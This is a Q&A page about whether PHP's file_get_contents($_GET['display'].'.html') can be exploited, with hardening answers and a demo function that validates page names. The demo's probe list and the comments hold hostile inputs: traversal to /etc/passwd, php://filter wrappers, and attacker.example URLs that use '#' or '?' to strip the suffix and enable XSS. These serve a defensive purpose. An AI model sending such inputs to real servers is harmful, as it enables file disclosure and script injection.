Exploiting file_get_contents()


Solution 1

No, that will only ever read files ending in '.html', but that doesn't necessarily mean that it's secure! Generally, the more that you can sanitise and restrict the input, the better.

Also, for anyone planning to use file_get_contents like this, it's always good to remember that when serving from file_get_contents, you can serve files that are not normally accessible - either due to server configuration, e.g. .htaccess, or file permissions.

Solution 2

As @David said, this will only get files ending in '.html', but it's not good practice. If you have an html folder and you want the user to get only files from that folder, you shouldn't do that: by using this method a hacker can access any .html file on your server, not just the ones you want him to see.

My suggestion is that if you have a specific folder that you want the user to be able to get files from, scan the directory and check for the file name.

Here's an example:

<?php

// Directory that holds the pages a visitor is allowed to request.
$dir   = '/html';
$paths = scandir($dir);

// Requested page name, or null when the parameter is absent.
$file = isset($_GET['display']) ? $_GET['display'] : null;

if (!$file) {
    die('no display provided');
}

$html = '';

foreach ($paths as $path) {
    // Serve only an exact match against an entry that really exists in $dir,
    // so traversal sequences, stream wrappers and other extensions never
    // reach file_get_contents().
    if ($path !== '.' && $path !== '..' && $path === $file . '.html') {
        // scandir() returns bare names: read from $dir, not the working directory.
        $html = file_get_contents($dir . '/' . $path);
    }
}

echo $html;

?>
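An added example that is not part of either answer above: the same "one directory, exact name" idea, written as a function that validates the name first and then compares realpath() results, so traversal, absolute paths, php:// and http:// wrappers and the "#.html" trick from the comments are all rejected before file_get_contents() runs. The function name read_page(), the temporary page directory and the probe values in $probes are assumptions constructed for the demonstration.

```php
<?php
// Added example (not from the original answers): a hardened replacement for
//   echo file_get_contents($_GET['display'].'.html');

/**
 * Return the contents of "$name.html" inside $baseDir, or null when $name does
 * not resolve to a regular file that lives inside that directory.
 */
function read_page(string $baseDir, string $name): ?string
{
    // 1. Allow only a plain page name. This alone rejects "/", "\", "..", ":"
    //    (so php://, file://, http:// wrappers), "#", "?" and NUL bytes.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/', $name)) {
        return null;
    }

    // 2. Resolve both paths on disk. realpath() returns false when the file
    //    does not exist and follows symlinks, so a symlink pointing outside
    //    $baseDir is caught as well.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $name . '.html');
    if ($base === false || $path === false) {
        return null;
    }

    // 3. The resolved file must sit under the resolved base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }

    return file_get_contents($path);
}

// ---- Self-contained demo with a constructed page directory ------------------
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'pages_' . bin2hex(random_bytes(4));
mkdir($dir, 0700);
file_put_contents($dir . '/index.html', "<h1>hello</h1>\n");
file_put_contents($dir . '/secret.txt', "not a page\n");

// Constructed values for ?display=... Every one of these would be passed
// straight into file_get_contents() by the original one-liner.
$probes = [
    'index',                                                 // legitimate page
    '../../../../etc/passwd',                                // path traversal
    '/etc/passwd',                                           // absolute path
    'php://filter/convert.base64-encode/resource=index.php', // stream wrapper
    'http://attacker.example/evil.js#',                      // remote fetch via allow_url_fopen; "#" hides ".html"
    'http://attacker.example/evil.js?x=',                    // same, ".html" lands in the query string
    "index\0",                                               // null byte
    'secret',                                                // exists as .txt only, so secret.html is absent
];

foreach ($probes as $p) {
    $result = read_page($dir, $p);
    printf("%-58s => %s\n", json_encode($p),
        $result === null ? 'REJECTED' : 'served ' . strlen($result) . ' bytes');
}

unlink($dir . '/index.html');
unlink($dir . '/secret.txt');
rmdir($dir);
```

Only the first probe is served; the rest are rejected by the name check or by the realpath() comparison, and none of them ever reaches file_get_contents(). The character allow-list does most of the work; the realpath() check is there so that a future relaxation of the pattern (dots in names, subdirectories) still cannot escape the base directory.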
Author: terjanq

Updated on June 04, 2022

Comments

  • terjanq
    terjanq almost 2 years

    Is it possible to read any file (not only those with the extension .html) from the server in the following script?

    <?php
    echo file_get_contents($_GET['display'].'.html');
    ?>
    

    I know about wrappers (php://, file://, etc.) but haven't achieved much with them.

    I'm eager to hear all the possible vectors of attack.

    The PHP configuration is default: allow_url_fopen On, and let's assume the version is >= 7.0, so null character %00 doesn't work.

    • Andreas
      Andreas over 6 years
      What is "display" variable?
    • terjanq
      terjanq over 6 years
      It's the variable attacker can control via GET request... http://example.com/script.php?display=[something_evil]
    • Andreas
      Andreas over 6 years
      I saw the comment that you do this to exploit. How? What is your plan? If you file_get_contents a PHP file you will not get the code, only the output of the PHP.
    • David A
      David A over 6 years
      So do you need to just access a file that you can't normally access, or do you need to be able to access an arbitrary file?
    • terjanq
      terjanq over 6 years
      If this is the duplicate then with it: stackoverflow.com/questions/12731547/… But the post is from 2012, and the proposed vector doesn't work anymore. @DavidA I'm wondering if I could for example read /etc/passwd, by trying something like: php://filter/resource=file:///etc/passwd, but the appended suffix is breaking the expression
    • Mark Baker
      Mark Baker over 6 years
      If the filename passed via $_GET contains a null byte, then yes, it is possible to exploit and access any file - null byte injection - which bypasses the appended extension
    • CBroe
      CBroe over 6 years
      This doesn't even need null bytes to become a catastrophe quickly ... As you say, allow_url_fopen is on, so I can make your site make a request to any http(s) URL of my choosing, and have it output the response to the user of your site ... hello XSS old friend. And appending .html is not going to stop me from including any URL I like, even ones I don't have control over - easily countered by ending the URL I feed your script so that it becomes ...&needlessquerystringparameter=.html or .../evil.js#.html
    • terjanq
      terjanq over 6 years
      That's exactly what my idea is about. But as long as removing the .html suffix in a URL is quite easy, exactly as you have shown, exploiting file_path is a bigger challenge. Null byte injection doesn't work for recent PHP versions.